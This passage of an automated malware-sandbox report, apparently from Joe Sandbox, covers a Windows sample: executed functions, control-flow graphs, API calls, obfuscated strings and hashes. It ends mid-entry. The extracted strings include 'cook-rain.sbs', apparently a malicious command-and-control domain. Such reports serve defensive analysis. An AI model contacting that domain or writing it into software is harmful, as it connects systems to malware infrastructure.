LdrInitializeThunk 6438->6446 6439->6438 6445 36e470 LdrInitializeThunk 6439->6445 6442->6427 6443->6431 6444->6439 6445->6438 6446->6435 6345 33d9e4 6346 33da00 6345->6346 6347 33da43 6346->6347 6349 36e470 LdrInitializeThunk 6346->6349 6349->6347 6350 370820 6352 370840 6350->6352 6351 37097e 6352->6351 6354 36e470 LdrInitializeThunk 6352->6354 6354->6351 6388 33c5e8 6389 36bab0 RtlFreeHeap 6388->6389 6390 33c5ee 6389->6390 6391 36bab0 RtlFreeHeap 6390->6391 6392 33c606 6391->6392 6373 33acce 6374 33acec 6373->6374 6377 33b220 6374->6377 6379 33b260 6377->6379 6378 33acf9 6379->6378 6379->6379 6380 36bab0 RtlFreeHeap 6379->6380 6380->6378 6370 33c48c 6371 36e3d0 2 API calls 6370->6371 6372 33c497 6371->6372

                                                                              Executed Functions

                                                                              Function 00354800 Relevance: 16.8, Strings: 13, Instructions: 508COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 354800-35485f 1 354860-3548ad 0->1 1->1 2 3548af-3548ff 1->2 4 354900-354942 2->4 4->4 5 354944-35494c 4->5 6 354970 5->6 7 354953-354959 5->7 8 354962-354969 5->8 9 354972 6->9 7->9 10 35495b-354960 7->10 8->6 11 354979-35499b call 3386e0 9->11 10->11 15 3549a2-3549a4 11->15 16 3549bc-3549cd 11->16 17 3549ac-354ede call 3386f0 11->17 15->17 19 3549d6 16->19 20 3549cf-3549d4 16->20 22 3549d8-354a1a call 3386e0 19->22 20->22 26 354a20-354a33 22->26 26->26 27 354a35-354a3d 26->27 28 354a61-354a6d 27->28 29 354a3f-354a44 27->29 31 354a91-354a9c call 370ba0 28->31 32 354a6f-354a73 28->32 30 354a50-354a5f 29->30 30->28 30->30 35 354aa1-354aad 31->35 33 354a80-354a8f 32->33 33->31 33->33 36 354ac4-354acd 35->36 37 354ab4-354abb 35->37 38 354d54-354d7f 35->38 39 354e86 35->39 40 354c50-354c56 call 3386f0 35->40 41 354c5f-354d13 35->41 42 354c38-354c42 35->42 43 354c4a 35->43 47 354ad6 36->47 48 354acf-354ad4 36->48 37->36 46 354d80-354d9c 38->46 40->41 45 354d20-354d32 41->45 42->43 45->45 50 354d34-354d4c call 352ba0 45->50 46->46 51 354d9e-354e35 46->51 52 354add-354b88 call 3386e0 47->52 48->52 50->38 54 354e40-354e59 51->54 59 354b90-354bb0 52->59 54->54 57 354e5b-354e7e call 3529d0 54->57 57->39 59->59 61 354bb2-354bba 59->61 63 354be1-354bed 61->63 64 354bbc-354bc3 61->64 66 354c11-354c31 call 370ba0 63->66 67 354bef-354bf3 63->67 65 354bd0-354bdf 64->65 65->63 65->65 66->38 66->39 66->40 66->42 66->43 68 354c00-354c0f 67->68 68->66 68->68
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8I>O$;IJK$;M|C$<=$@A$C1D7$C5+K$H=K3$V%C;$]!S'$_-_#$_9_?$YW
                                                                              • API String ID: 0-1278073768
                                                                              • Opcode ID: 2281caa824884cecce71a7c3fa33d0f3ad78d79b3bda594c1e4d6be36a95747f
                                                                              • Instruction ID: 81a4e0f88af187592407e4d0caffea0f58f4d6db93f93ad7450970862e33cbb7
                                                                              • Opcode Fuzzy Hash: 2281caa824884cecce71a7c3fa33d0f3ad78d79b3bda594c1e4d6be36a95747f
                                                                              • Instruction Fuzzy Hash: EDF1DCB110C3408FE315DF24D89166BBBE4FF86349F15892CE9D98B2A0E774C949CB96
                                                                              Function 00369310 Relevance: 14.7, APIs: 5, Strings: 3, Instructions: 668memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 72 369310-369365 73 369370-36939e 72->73 73->73 74 3693a0-3693ba 73->74 76 3693c7-369417 74->76 77 3693bc 74->77 79 369975-3699a1 call 3700a0 GetVolumeInformationW 76->79 80 36941d-369454 76->80 77->76 85 3699a5-3699c6 call 34fa80 79->85 86 3699a3 79->86 82 369460-36949d 80->82 82->82 84 36949f-3694d1 SysAllocString 82->84 89 3694d7-3694f1 CoSetProxyBlanket 84->89 90 36995d-369971 84->90 94 3699d0-3699d8 85->94 86->85 92 3694f7-369517 89->92 93 369953-369959 89->93 90->79 95 369520-36953f 92->95 93->90 94->94 96 3699da-3699dc 94->96 95->95 98 369541-3695c2 95->98 99 3699ee-369a1f call 34fa80 96->99 100 3699de-3699eb call 338870 96->100 108 3695d0-369613 98->108 107 369a20-369a28 99->107 100->99 107->107 109 369a2a-369a2c 107->109 108->108 110 369615-36963f 108->110 111 369a3e-369a6d call 34fa80 109->111 112 369a2e-369a3b call 338870 109->112 121 369645-36966b 110->121 122 369941-369950 SysFreeString * 2 110->122 118 369a70-369a78 111->118 112->111 118->118 120 369a7a-369a7c 118->120 123 369a8e-369abb call 34fa80 120->123 124 369a7e-369a8b call 338870 120->124 130 369933-36993d 121->130 131 369671-369674 121->131 122->93 133 369ac0-369ac8 123->133 124->123 130->122 131->130 132 36967a-36967f 131->132 132->130 134 369685-3696d5 132->134 133->133 135 369aca-369acc 133->135 141 3696e0-36972c 134->141 137 369ade-369ae5 135->137 138 369ace-369adb call 338870 135->138 138->137 141->141 143 36972e-36973c 141->143 144 369740-369742 143->144 145 369920-369931 144->145 146 369748-36974e 144->146 145->130 146->145 147 369754-36975e 146->147 149 369760-369765 147->149 150 36979d 147->150 152 36977c-369780 149->152 151 36979f-3697b7 call 3386e0 150->151 162 3698d4-3698e5 151->162 163 3697bd-3697c7 151->163 155 369782-36978b 152->155 156 369770 152->156 159 369792-369796 155->159 160 36978d-369790 155->160 158 369771-36977a 156->158 158->151 158->152 159->158 161 369798-36979b 159->161 160->158 161->158 165 3698e7 162->165 166 3698ec-3698f8 162->166 163->162 164 3697cd-3697d5 163->164 167 3697e0-3697ea 164->167 165->166 168 3698ff-36991d call 338710 call 3386f0 166->168 169 3698fa 166->169 170 369800-369806 167->170 171 3697ec-3697f1 167->171 168->145 169->168 174 369824-369830 170->174 175 369808-36980b 170->175 173 369880-369886 171->173 178 369888-36988e 173->178 180 369832-369835 174->180 181 36989a-3698a2 174->181 175->174 179 36980d-369822 175->179 178->162 183 369890-369892 178->183 179->173 180->181 186 369837-36987f 180->186 184 3698a4-3698a6 181->184 185 3698a8-3698ab 181->185 183->167 187 369898 183->187 184->178 188 3698d0-3698d2 185->188 189 3698ad-3698ce 185->189 186->173 187->162 188->173 189->173
                                                                              APIs
                                                                              • SysAllocString.OLEAUT32(81578756), ref: 003694A5
                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003694E9
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,116B1F3B,00000000,00000000,00000000,00000000), ref: 0036999D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: AllocBlanketInformationProxyStringVolume
                                                                              • String ID: ()$0}bc$\
                                                                              • API String ID: 2230333033-1331217852
                                                                              • Opcode ID: ab3e044e9b209ed0bae1734552e6afcd951793ba85519a33210b3b8a4bf9d127
                                                                              • Instruction ID: 7dee717ba75e8d60522dfde05dcd77f8f08b12bcd94d127b6527f78fde26d984
                                                                              • Opcode Fuzzy Hash: ab3e044e9b209ed0bae1734552e6afcd951793ba85519a33210b3b8a4bf9d127
                                                                              • Instruction Fuzzy Hash: CC227272A083019FD725CF24CC85B6BBBEAEBC6310F19891DF4859B281D7B0D905CB92
                                                                              Function 00352BA0 Relevance: 13.1, Strings: 10, Instructions: 644COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 190 352ba0-352be5 call 3709e0 193 3534fd-35350d 190->193 194 352beb-352c6f call 348910 call 36ba10 190->194 199 352c74-352c82 194->199 199->199 200 352c84 199->200 201 352c86-352c89 200->201 202 352cf3-352cfa 201->202 203 352c8b-352cf1 201->203 204 352cfc-352d07 202->204 203->201 205 352d0e-352d25 204->205 206 352d09 204->206 208 352d27-352db5 205->208 209 352d2c-352d37 205->209 207 352dc8-352dcb 206->207 210 352dcd 207->210 211 352dcf-352dd4 207->211 213 352db7-352dbc 208->213 209->213 214 352d39-352da9 call 36e470 209->214 210->211 218 3533c8-35340d call 36bab0 211->218 219 352dda-352dea 211->219 216 352dc0-352dc3 213->216 217 352dbe 213->217 220 352dae-352db3 214->220 216->204 217->207 227 353412-353420 218->227 222 352dec-352e10 219->222 220->213 224 352e16-352e35 222->224 225 352fee 222->225 228 352e3a-352e45 224->228 226 352ff2-352ff5 225->226 229 352ff7-352ffb 226->229 230 352ffd-353013 call 36ba10 226->230 227->227 231 353422-353424 227->231 228->228 232 352e47-352e49 228->232 233 35302b-35302d 229->233 249 353015-353029 230->249 250 353017-353022 230->250 235 353426-353429 231->235 236 352e4b-352e4e 232->236 237 353033-353052 233->237 238 35339b-3533a6 233->238 240 353493-35349c 235->240 241 35342b-353491 235->241 242 352e67-352e83 call 353510 236->242 243 352e50-352e65 236->243 248 353057-353062 237->248 245 3533a8-3533b8 238->245 246 3533aa-3533b2 238->246 244 35349e-3534a4 240->244 241->235 242->225 262 352e89-352ec4 242->262 243->236 252 3534a6 244->252 253 3534a8-3534ba 244->253 256 3533ba 245->256 246->256 248->248 257 353064-35306c 248->257 249->233 251 3533bc-3533be 250->251 251->222 264 3533c4-3533c6 251->264 259 3534fb 252->259 260 3534bc 253->260 261 3534be-3534c4 253->261 256->251 263 35306e-353071 257->263 259->193 265 3534eb-3534ee 260->265 261->265 267 3534c6-3534e6 call 36e470 261->267 266 352ec9-352ed7 262->266 268 353073-3530c8 263->268 269 3530ca-35310b 263->269 264->218 273 3534f4-3534f9 265->273 274 3534f0-3534f2 265->274 266->266 271 352ed9-352edd 266->271 267->265 268->263 275 353110-35311e 269->275 276 352edf-352ee2 271->276 273->244 274->259 275->275 277 353120-353122 275->277 278 352ee4-352f1b 276->278 279 352f1d-352f3b call 353510 276->279 280 353126-353129 277->280 278->276 286 352f46-352f67 279->286 287 352f3d-352f41 279->287 282 353197-35319e 280->282 283 35312b-353195 280->283 285 3531a0-3531ab 282->285 283->280 288 3531b2-3531c9 285->288 289 3531ad 285->289 292 352f69 286->292 293 352f6b-352fec call 3386e0 call 348580 call 3386f0 286->293 287->226 290 3531d0-3531db 288->290 291 3531cb-353267 288->291 294 35327a-35327d 289->294 296 3531e1-35325b call 36e470 290->296 297 353269-35326e 290->297 291->297 292->293 293->226 298 353281-3532a0 294->298 299 35327f 294->299 307 353260-353265 296->307 303 353270 297->303 304 353272-353275 297->304 305 3532a5-3532b0 298->305 299->298 303->294 304->285 305->305 308 3532b2 305->308 307->297 310 3532b4-3532b7 308->310 311 35332d-353333 310->311 312 3532b9-35332b 310->312 313 353335-353339 311->313 314 353369-353375 311->314 312->310 316 35333b-353342 313->316 318 353377-353386 call 36bab0 314->318 319 353388-35338a 314->319 320 353344-353350 316->320 321 353352-35335b 316->321 324 35338c-35338f 318->324 319->324 320->316 325 35335d 321->325 326 35335f 321->326 324->238 329 353391-353399 324->329 330 353365-353367 325->330 326->330 329->251 330->314
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !@$"$,$A$D$E$J$K$L$w
                                                                              • API String ID: 0-3285155985
                                                                              • Opcode ID: b3275968512b88a4475127c548a23a8c195f6f402df0edfda609f612003e0fc7
                                                                              • Instruction ID: afe10d49067b1be2fca3bdf4e3239aa06a29ed716cfa892659b203e1251156fd
                                                                              • Opcode Fuzzy Hash: b3275968512b88a4475127c548a23a8c195f6f402df0edfda609f612003e0fc7
                                                                              • Instruction Fuzzy Hash: C142257260C7808BD3368B28C89176FBBE1ABD6354F18892DE9D5C73E1D77889498743
                                                                              Function 0033CEF5 Relevance: 12.8, Strings: 10, Instructions: 293COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 332 33cef5-33cf0f 333 33cf10-33cf2a 332->333 333->333 334 33cf2c-33cf43 call 338ea0 call 369310 333->334 338 33cf48-33cf73 334->338 339 33cf80-33cf9a 338->339 339->339 340 33cf9c-33d019 339->340 341 33d020-33d088 340->341 341->341 342 33d08a-33d09b 341->342 343 33d0bd-33d0c1 342->343 344 33d09d-33d0af 342->344 345 33d0c5-33d0cd 343->345 346 33d0b0-33d0b9 344->346 347 33d0db-33d0e8 345->347 348 33d0cf 345->348 346->346 349 33d0bb 346->349 351 33d10b-33d113 347->351 352 33d0ea-33d0f1 347->352 350 33d0d0-33d0d9 348->350 349->345 350->347 350->350 354 33d115-33d116 351->354 355 33d12b-33d255 351->355 353 33d100-33d109 352->353 353->351 353->353 356 33d120-33d129 354->356 357 33d260-33d27a 355->357 356->355 356->356 357->357 358 33d27c-33d2a7 357->358 359 33d2b0-33d2fe 358->359 359->359 360 33d300-33d34c call 33bdb0 359->360
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +"#R$-0p#$.$["$39my$6(S"$8C76D044CA0F3E1063CFCF7E6C45F838$^GFA$c^.z$cook-rain.sbs$~sx=
                                                                              • API String ID: 0-3077670400
                                                                              • Opcode ID: 8ec76324e5676f1ef683a9200013747d8c121f478f1e11202001c5686e346301
                                                                              • Instruction ID: e6d3e5415d27e3b2561c5f1b51de72c6b87a64dc711e2e11c89e94907b4f1001
                                                                              • Opcode Fuzzy Hash: 8ec76324e5676f1ef683a9200013747d8c121f478f1e11202001c5686e346301
                                                                              • Instruction Fuzzy Hash: A3A1D17058C3C28FD33A8F2595917EBBBE1ABA2314F18997CC0D98B245DB7904068B93
                                                                              Function 0033DCB7 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 320COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 363 33dcb7-33dcf6 call 363e90 call 339dc0 CoUninitialize 368 33dd00-33dd19 363->368 368->368 369 33dd1b-33dd3b 368->369 370 33dd40-33dd64 369->370 370->370 371 33dd66-33dddf 370->371 372 33dde0-33ddfd 371->372 372->372 373 33ddff-33de10 372->373 374 33de12-33de19 373->374 375 33de2b-33de33 373->375 376 33de20-33de29 374->376 377 33de35-33de36 375->377 378 33de4b-33de58 375->378 376->375 376->376 381 33de40-33de49 377->381 379 33de7b-33de87 378->379 380 33de5a-33de61 378->380 383 33de9b-33dea5 379->383 384 33de89-33de8a 379->384 382 33de70-33de79 380->382 381->378 381->381 382->379 382->382 386 33dea7-33deab 383->386 387 33debb-33dec7 383->387 385 33de90-33de99 384->385 385->383 385->385 388 33deb0-33deb9 386->388 389 33dee1-33e025 387->389 390 33dec9-33decb 387->390 388->387 388->388 392 33e030-33e07b 389->392 391 33ded0-33dedd 390->391 391->391 393 33dedf 391->393 392->392 394 33e07d-33e0a8 392->394 393->389 395 33e0b0-33e0d5 394->395 395->395 396 33e0d7-33e123 call 33bdb0 395->396
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: $#$@KFQ$cook-rain.sbs$_Q
                                                                              • API String ID: 3861434553-3915531445
                                                                              • Opcode ID: 34c59f9cf54f2a4c6e04ef3a0ee9776ebd3e4c1a83a3e3e7edcd606622491926
                                                                              • Instruction ID: e715ec242d921dbf68173aaaf1b340b8c8216ae6a9c9c950afbe2a7f9a78e714
                                                                              • Opcode Fuzzy Hash: 34c59f9cf54f2a4c6e04ef3a0ee9776ebd3e4c1a83a3e3e7edcd606622491926
                                                                              • Instruction Fuzzy Hash: E0B1AB7510D3C28BD3368B2594917EBFFE2AFE6304F19996CE0C94B242D778450ACB92
                                                                              Function 0033BDB0 Relevance: 7.6, Strings: 6, Instructions: 101COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 399 33bdb0-33c00f 400 33c010-33c02c 399->400 400->400 401 33c02e-33c03a 400->401 402 33c03d-33c061 401->402
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: AK$J's)$m?i!$u#{%$~+*-$[:]
                                                                              • API String ID: 0-2167574748
                                                                              • Opcode ID: 866f3ff8e5c8ee38cf93b571e3e07028073a50446865a7e797bc768730d8b381
                                                                              • Instruction ID: 5b05cd81ac817d85c1fee88b3a9ae931e9afaf9e358e80776c27bdfda470a24c
                                                                              • Opcode Fuzzy Hash: 866f3ff8e5c8ee38cf93b571e3e07028073a50446865a7e797bc768730d8b381
                                                                              • Instruction Fuzzy Hash: A651EDB45593848BE3748F118482B8FBBB1FB91300F508A1CE2D86B794CBB84446CF57
                                                                              Function 00371160 Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 453 371160-37117f 454 371180-371189 453->454 454->454 455 37118b-371201 454->455 456 371210-37123a 455->456 456->456 457 37123c-371247 456->457 458 371295-37129c 457->458 459 371249-371251 457->459 460 371260-371268 459->460 461 371271-371277 460->461 462 37126a-37126d 460->462 461->458 464 371279-37128d call 36e470 461->464 462->460 463 37126f 462->463 463->458 466 371292 464->466 466->458
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: @$P?l1
                                                                              • API String ID: 2994545307-4135037845
                                                                              • Opcode ID: 5b3ca3d8232ebef28f4357f0f448f848c6b69d6d27dbb6642dcde1d92c1d1810
                                                                              • Instruction ID: f5a4fa93b92cafb2cb4a1cdfb29a53417af3f5a22a8dc5919d0414d2c02d44de
                                                                              • Opcode Fuzzy Hash: 5b3ca3d8232ebef28f4357f0f448f848c6b69d6d27dbb6642dcde1d92c1d1810
                                                                              • Instruction Fuzzy Hash: D03102722083049FC325DF58C4C162BBBF8FF99354F159C2DEA898B291D3799908CB96
                                                                              Function 00338F20 Relevance: 1.7, APIs: 1, Instructions: 178COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
